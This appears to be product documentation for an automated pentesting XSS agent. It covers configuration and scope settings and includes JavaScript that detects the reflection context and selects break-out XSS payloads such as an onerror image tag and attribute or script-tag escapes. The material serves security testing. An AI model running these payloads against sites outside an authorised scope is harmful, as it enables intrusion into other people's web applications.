
XSS Agent

The XSS (Cross-Site Scripting) Agent autonomously discovers reflected, stored, and DOM-based XSS issues through context-aware payload crafting and testing.

Capabilities

  • Reflected XSS Detection: Tests for XSS where user-supplied input is echoed, unescaped, into the immediate response
  • Stored XSS Detection: Tests for XSS where user-supplied input is persisted and rendered later, often on a different page or to a different user
  • DOM-Based XSS Detection: Tests for XSS that arises client-side, where page JavaScript reads attacker-controlled data (for example from the URL) into a dangerous DOM sink
  • Context-Aware Payload Generation: Crafts payloads adapted to the injection context, including HTML body, attribute, JavaScript, CSS and SVG contexts
  • CSP Bypass Techniques: Tests Content Security Policy bypass methods
  • Framework-Specific Testing: Tests applications built with React, Vue, Angular and Svelte
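The context-aware step is the part worth seeing in code. The following is an added example, not the XSS agent's own code: it sends a canary plus a probe of metacharacters, works out which context the reflection landed in (HTML text, comment, tag, quoted or unquoted attribute, JavaScript string or code), checks which probe characters came back unencoded, and only then picks a payload that can break out of that context. All function names and the sample responses are constructed for this illustration.

```javascript
// Added example, not the XSS agent's own code: classify where a reflected canary
// lands in an HTML response, check which metacharacters survived encoding, and
// pick a break-out payload for that context. Names and samples are constructed.
const CANARY = "zq7canary9k";   // unique token containing no metacharacters
const PROBE = `<>"'`;           // the request carries CANARY + PROBE
const ENTITIES = {              // encoded forms recognised on the way back
  "<": ["&lt;", "&#60;"], ">": ["&gt;", "&#62;"], '"': ["&quot;", "&#34;"], "'": ["&#39;", "&#x27;"],
};

// Quote character if a JavaScript prefix ends inside a string literal, else null.
function jsStringState(js) {
  let quote = null;
  for (let i = 0; i < js.length; i++) {
    const c = js[i];
    if (!quote) { if ('"\'`'.includes(c)) quote = c; }
    else if (c === "\\") i++;                 // skip the escaped character
    else if (c === quote) quote = null;
  }
  return quote;
}

// Where a tag prefix such as `<input value="` ends: in a value (quote null when unquoted), after "=", or at a name.
function tagState(tagPrefix) {
  let state = "name", quote = null;
  for (const c of tagPrefix.slice(1)) {
    if (state === "value") {
      if (quote ? c === quote : /\s/.test(c)) { state = "name"; quote = null; }
    } else if (c === "=") state = "eq";
    else if (state === "eq" && !/\s/.test(c)) {
      state = "value"; quote = c === '"' || c === "'" ? c : null;
    }
  }
  return { state, quote };
}

function classifyContext(html, canary = CANARY) {
  const at = html.indexOf(canary);
  if (at < 0) return { context: "not-reflected" };
  const before = html.slice(0, at), lower = before.toLowerCase();
  const sOpen = lower.lastIndexOf("<script");
  if (sOpen >= 0 && lower.indexOf("</script", sOpen) < 0) {    // unclosed <script>
    const quote = jsStringState(before.slice(before.indexOf(">", sOpen) + 1));
    return quote ? { context: "js-string", quote } : { context: "js-code" };
  }
  const cOpen = before.lastIndexOf("<!--");
  if (cOpen >= 0 && before.indexOf("-->", cOpen) < 0) return { context: "html-comment" };
  if (before.lastIndexOf("<") > before.lastIndexOf(">")) {     // inside a tag
    const { state, quote } = tagState(before.slice(before.lastIndexOf("<")));
    if (state !== "value") return { context: "tag" };
    return quote ? { context: "attr-quoted", quote } : { context: "attr-unquoted" };
  }
  return { context: "html-text" };
}

// Which probe characters came back verbatim right after the canary?
function rawMetachars(html, canary = CANARY) {
  const raw = {}, lower = html.toLowerCase();
  let pos = html.indexOf(canary);
  if (pos < 0) return raw;
  pos += canary.length;
  for (const ch of PROBE) {
    if (html.startsWith(ch, pos)) { raw[ch] = true; pos += 1; continue; }
    const ent = ENTITIES[ch].find((e) => lower.startsWith(e, pos));
    if (!ent) break;                          // stripped or backslash-escaped: stop
    raw[ch] = false; pos += ent.length;
  }
  return raw;
}

// Payload that breaks out of the detected context, or null if the characters it needs were encoded.
// Inside <script>, "</script>" ends the element regardless of JS string state, so it is the fallback there.
function choosePayload(ctx, raw) {
  const need = (...chars) => chars.every((c) => raw[c]);
  const img = "<img src=x onerror=alert(1)>";
  switch (ctx.context) {
    case "html-text":     return need("<", ">") ? img : null;
    case "html-comment":  return need("<", ">") ? "-->" + img : null;
    case "attr-quoted":   return need(ctx.quote) ? `${ctx.quote} onfocus=alert(1) autofocus x=${ctx.quote}` : null;
    case "attr-unquoted": case "tag": return " onfocus=alert(1) autofocus";
    case "js-string":     return need(ctx.quote) ? `${ctx.quote};alert(1);//`
                               : need("<", ">") ? "</script>" + img : null;
    case "js-code":       return ";alert(1);//";
    default:              return null;
  }
}

function scan(html) {
  const ctx = classifyContext(html), raw = rawMetachars(html);
  return { ...ctx, raw, payload: choosePayload(ctx, raw) };
}

// Constructed sample responses to a request carrying CANARY + PROBE.
const SAMPLES = {
  text:    `<p>No results for ${CANARY}<>"'</p>`,
  attrDq:  `<input type="text" name="q" value="${CANARY}&lt;&gt;&quot;'">`,
  attrSq:  `<a title='${CANARY}&lt;&gt;&quot;'' href="/search">again</a>`,
  jsStr:   `<script>var q = '${CANARY}<>"\\'';</script>`,
  comment: `<!-- debug: ${CANARY}<>"' -->`,
};
for (const [name, html] of Object.entries(SAMPLES)) console.log(name, scan(html));
```

The canary is deliberately free of metacharacters so it locates the reflection without tripping filters; the separate probe then shows which characters the application encodes, and that, not the context alone, decides whether a break-out is possible. The attrDq sample makes the point: the reflection sits inside a double-quoted attribute, the single quote survives, but the double quote is entity-encoded, so no attribute break-out is reported. The jsStr sample shows the opposite caveat: the application backslash-escapes the quote inside the JavaScript string, but leaves angle brackets alone, so the closing script tag still gets out.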

Configuration

Basic Configuration

The XSS agent is enabled by default on all automated pentesting scans. No additional configuration is required for the agent to run.

To explicitly disable it:

automated_pentesting:
  xss_agent:
    enabled: false

Natural-Language Guidance

Use automated_pentesting.xss_agent.natural_language to tell the agent where user-controlled content is most important, what workflows matter, and which actions should be avoided.

This field is optional, but it improves prioritization and helps the agent spend more time on the pages and inputs that are most likely to surface meaningful XSS issues.

automated_pentesting:
  xss_agent:
    enabled: true
    natural_language: |
      Profile names, ticket comments, and internal announcements are rendered in
      multiple pages across the application. Prioritize stored XSS in rich-text
      inputs and markdown-like editors. Avoid logout, billing, and account deletion
      flows during testing.

Good things to include:

  • High-value inputs that render user-controlled content later
  • Important pages or workflows to prioritize
  • Risky rendering contexts such as WYSIWYG editors, markdown, previews, or templated emails
  • Actions the agent should avoid because they are destructive or out of scope

Scope Configuration

Configure scope to focus testing:

scope:
  include:
    - "https://app.example.com/*"
  exclude:
    - "https://app.example.com/admin/*"
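As an added example (not the agent's own code; the page does not describe its matching rules), here is one way to evaluate include/exclude rules of the form above, with assumed semantics: the scheme and host of a rule must match the URL's exactly, a * in the path part matches anything including slashes, and a URL is in scope only if some include rule matches and no exclude rule does. A leading "*." in the host, allowing subdomains, is an assumed extension used to show a pitfall: if the whole rule is treated as a flat glob over the URL string, a host wildcard can run across "/" into the query string, and an out-of-scope host that carries the in-scope host name in its URL would be crawled.

```javascript
// Added example, not the product's code. The scope rules are evaluated with the
// assumed semantics described in the lead-in; the "*." host prefix is an
// assumed extension and the decoy URL is constructed for this illustration.
const escapeRe = (s) => s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");

function parseRule(rule) {
  const m = /^(https?):\/\/([^/]+)(\/.*)?$/.exec(rule);
  if (!m) throw new Error("unsupported scope rule: " + rule);
  return { scheme: m[1] + ":", host: m[2].toLowerCase(), path: m[3] || "/" };
}

// Host must match exactly; "*.example.com" additionally accepts any subdomain.
function hostMatches(pattern, host) {
  return pattern.startsWith("*.") ? host.endsWith(pattern.slice(1)) : pattern === host;
}

// "*" in the path part may span "/" and the query string.
function pathMatches(glob, path) {
  const re = glob.split("*").map(escapeRe).join(".*");
  return new RegExp("^" + re + "$").test(path);
}

function ruleMatches(rule, url) {
  const u = new URL(url), r = parseRule(rule);
  return u.protocol === r.scheme && hostMatches(r.host, u.host) && pathMatches(r.path, u.pathname + u.search);
}

// In scope only if an include rule matches and no exclude rule does.
function inScope(scope, url) {
  const hit = (rules) => (rules || []).some((r) => ruleMatches(r, url));
  return hit(scope.include) && !hit(scope.exclude);
}

// For contrast: a flat glob over the whole URL lets a host wildcard run across
// "/" into the query string, so the decoy below is wrongly accepted.
function naiveMatch(rule, url) {
  return new RegExp("^" + rule.split("*").map(escapeRe).join(".*") + "$").test(url);
}

// Scope from the page's example, plus a constructed wildcard-host variant and decoy.
const SCOPE = { include: ["https://app.example.com/*"], exclude: ["https://app.example.com/admin/*"] };
const WILDCARD = { include: ["https://*.example.com/*"] };
const DECOY = "https://evil.net/?next=.example.com/";

console.log(inScope(SCOPE, "https://app.example.com/tickets/42?tab=comments"),  // true
            inScope(SCOPE, "https://app.example.com/admin/users"),               // false
            inScope(WILDCARD, DECOY), naiveMatch(WILDCARD.include[0], DECOY));   // false, true
```

Matching on parsed URL components rather than on the raw string is what keeps the host check honest; it also means a scheme change (http instead of https) or a port not present in the rule falls out of scope rather than silently matching.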

Requirements

  • Web Applications: Designed for web applications, not APIs
  • JavaScript Execution: Requires JavaScript execution for DOM-based XSS testing
  • Start URL: Initial URL to begin exploration
  • Authentication (optional): Configure if application requires authentication

Limitations

  • Web applications only
  • Requires JavaScript execution
  • Tests within configured scope boundaries
  • Limited by scan timeout settings

Best Practices

  • Keep natural_language concrete and application-specific.
  • Mention stored-content surfaces explicitly when persistence matters.
  • Prefer describing business-relevant workflows over generic instructions like "test everything".
  • Use scan scope to restrict where the agent can go; use natural_language to explain what matters within that scope.